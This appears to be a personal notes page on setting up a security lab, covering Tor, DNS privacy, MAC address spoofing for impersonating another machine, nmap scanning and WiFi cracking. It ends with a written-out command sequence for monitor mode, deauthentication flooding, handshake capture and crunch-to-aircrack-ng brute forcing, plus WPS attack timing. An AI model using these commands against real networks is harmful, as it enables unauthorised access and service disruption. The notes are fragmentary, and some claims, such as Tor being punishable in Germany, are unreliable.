Environment Setup
Publish date: Aug 10, 2019
Last updated: Apr 22, 2020
Last updated: Apr 22, 2020
- DKMS
- Dynamic Kernel Module System
Linux kernel modules whose sources generally reside outside the kernel source tree
apt install -y dkms linux-headers-$(uname -r)
VM guest additions module
Do not run tor as root, infact do not browse as root
- Running tor is punishable for 3 years in Germany
- hidden wiki
- proxychains
proxychains firefox www.duckduckgo.com
- Countries which are censored for using tor
- DNS Servers
/etc/resolv.conf
/etc/dhcp/dhclient.conf
- HIding DNS from our service provider
- DNS Book
- DNSleak
- Change MAC address - Media access control
macchanger
- prent to be someone else computer, like other person in school, office
- script to change mac Address at every reboot
@reboot
in crontab entries
- IP address physical location
- search engine
what is <IP>
- iplookup
- `nslookup
- search engine
- by default
nmap
will scan for1000
ports- save
nmap
output to a file, then manupulate it withgrep
andawk
- exploit-db
- save
Wireless
aircarch-ng
reaver
- WiFi Protected Setup Attack Tool, PINcrunch
- generate wordlists from a character set- pipe
crunch
output toaircrack-ng
to forWEP
- Interface in Monitor Mode
- Promiscuous mode
wash --interface=wlan0
forWPS
search on internet which router model you are attacking for Lockout attempts
- then plan attack accordingly
2 attempts every 60 seconds
2:60
ifconfig wlp2s0 down iwconfig wlp2s0 mode monitor ifconfig wlp2s0 up watch --differences 'cat /proc/net/wireless' airmon-ng check wlan0 airodump-ng wlan0 nmcli device wifi list airodump-ng --bssid <> -c <> -w <file> wlan0 # Deauthenticate airplay-ng -0 0 -a <BSSID> wlan0 crunch 11 11 -t %%%%hunder 1234567890 \ | aircrack-ng -w - SCAN_test01.cap -e <wifiName>
Use
timeout
to run a command for certain timeRun brute force attack in multiple machines
192.168.1.* - wired connection
192.168.0.* - wireless connection
Footnotes
[^2]: